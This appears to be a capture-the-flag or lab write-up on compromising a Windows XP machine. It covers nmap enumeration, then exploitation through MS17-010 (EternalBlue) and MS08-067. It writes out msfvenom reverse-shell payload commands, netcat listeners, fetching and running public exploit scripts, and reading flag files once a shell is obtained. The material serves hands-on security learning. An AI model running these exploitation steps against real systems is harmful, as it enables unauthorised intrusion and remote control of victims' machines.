[Enumeration]
- Port scan
nmap -Pn <ip>
2. Port scan with high port number
nmap -Pn -p- <ip>
No high ports
3. OS detection, version detection, script scanning, and traceroute
nmap -A <ip>
This machine is Windows XP.
4. Samba scan
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse <ip>
Nothing much
5. Vulnerability scan
nmap --script vuln <ip>
There’re 2 exploits that I can use: ms08–067 and ms17–010
[Exploitation]
There’re 2 exploits that I’m gonna use:
- ms08–067
- ms17–010
I’m familiar with ms17–010 (eternal blue). I’ll try this first.
1.ms17–010
I use this script from https://github.com/helviojunior/MS17-010
I’ll use ‘send_and_execute.py’.
First, create reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f exe > shell.exe
Create listener
nc -lvp 1234
Run the script
python send_and_execute.py <target ip> <shell path>
Back to listener, now I have a shell.
Find user.txt
dir user.txt /s /b
cd \Documents and Settings\john\Desktop\type user.txt
cd \dir *root.txt* /s /b
cd \Documents and Settings\Administrator\Desktop\type root.txt
2. ms08–067
Search exploits
searchsploit ms08-067
Copy the exploit to working directory
searchsploit -m 40279
Review the code
Generate new shellcode. In my case, I will use netcat as a listener.
msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f python > shellcode.txt
Copy generated shellcode to the script
Try to run the script
python 40279.pypython 40279.py 1 <ip>python 40279.py 2 <ip>
Both options failed, maybe this machine is WinXP SP3. I have to find another way.
Let’s search ms08–067 with google. I came across to this, thanks to andyver: https://github.com/andyacer/ms08_067
wget https://raw.githubusercontent.com/andyacer/ms08_067/master/ms08_067_2018.py
Generate shellcode
msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f python -a x86 --platform windows > shellcode_python.txt
Replace shellcode in the script
Test command
python ms08_067_2018.py
Create listener
nc -lvp 1234
Since I suspect this machine is WinXP SP3. I use this command.
python ms08_067_2018.py <ip> 6 445
Back to listener, now I have a shell.